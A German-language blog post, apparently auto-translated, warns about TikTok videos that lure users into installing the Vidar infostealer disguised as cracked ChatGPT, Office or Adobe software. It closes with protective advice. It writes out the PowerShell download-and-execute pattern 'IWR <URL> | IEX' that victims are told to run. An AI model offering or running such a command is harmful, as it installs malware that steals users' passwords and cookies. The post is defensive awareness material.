Gefälschte Software-Downloads auf TikTok schleusen Malware ein
Dieser Blogartikel wurde automatisch erstellt (und übersetzt). Er basiert auf dem folgenden Original, das ich für die Veröffentlichung auf diesem Blog ausgewählt habe:
REPORT THIS ACCOUNT – YouTube.
Gefälschte Software-Downloads auf TikTok schleusen Malware ein
Auf TikTok kursieren Videos, die vermeintlich gecrackte Versionen von Software wie ChatGPT, Office 365 oder Adobe Premiere anbieten. Anstatt die versprochenen Programme zu installieren, schleusen diese jedoch Schadsoftware ein, die sensible Daten stiehlt.
Die Masche
Die Betrüger nutzen die PowerShell, ein Kommandozeilenwerkzeug von Windows, um Schadcode aus dem Internet herunterzuladen und auszuführen. Nutzer werden dazu aufgefordert, über die Eingabeaufforderung (Windows-Taste + R) einen bestimmten Befehl einzugeben. Dieser Befehl lädt dann im Hintergrund Malware herunter und installiert sie.
Konkret wird der Befehl IWR <URL> | IEX verwendet. IWR ist ein Alias für Invoke-WebRequest, womit Inhalte von einer Webseite heruntergeladen werden. IEX steht für Invoke-Expression und führt den heruntergeladenen Code aus. Das Problem: Der Nutzer hat keine Kontrolle darüber, was dieser Code tatsächlich tut.
Analyse der Malware
Die Analyse der Malware zeigt, dass es sich um den Vidar-Infostealer handelt. Dieser Schadprogramm ist darauf ausgelegt, Passwörter, Cookies, Browserverlauf und andere sensible Daten von dem infizierten System zu stehlen. Die gestohlenen Daten werden dann an einen Server der Angreifer übertragen, die diese für kriminelle Zwecke missbrauchen können.
Vidar zielt auf eine Vielzahl von Anwendungen ab, darunter:
- Webbrowser (Chrome, Firefox, Opera etc.)
- E-Mail-Clients (Thunderbird)
- Weitere Anwendungen, in denen Anmeldedaten gespeichert sind
Schutzmaßnahmen
Um sich vor dieser Art von Angriffen zu schützen, sollte man folgende Punkte beachten:
- Vorsicht bei TikTok-Videos: Sei skeptisch gegenüber Angeboten, die kostenlose oder gecrackte Software versprechen.
- Unbekannte PowerShell-Befehle vermeiden: Führe keine PowerShell-Befehle aus, deren Herkunft und Funktion du nicht kennst.
- Aktuelle Antivirensoftware: Stelle sicher, dass dein Antivirenprogramm aktuell ist und aktiviere den Echtzeitschutz.
- Gesunder Menschenverstand: Wenn etwas zu gut klingt, um wahr zu sein, ist es das wahrscheinlich auch.
Fazit
Die Masche der Betrüger auf TikTok ist perfide. Sie nutzen das Interesse an kostenloser Software aus, um ahnungslose Nutzer mit Malware zu infizieren. Es ist daher wichtig, wachsam zu sein und sich vor solchen Angriffen zu schützen. Im Zweifelsfall sollte man von der Installation unbekannter Software absehen und stattdessen auf vertrauenswürdige Quellen zurückgreifen.
Ist es wirklich wert, das Risiko einzugehen, persönliche Daten preiszugeben, nur um ein paar Euro zu sparen? Welchen Weg wollen wir einschlagen: Bequemlichkeit und vermeintliche Ersparnis oder Sicherheit und Datenschutz?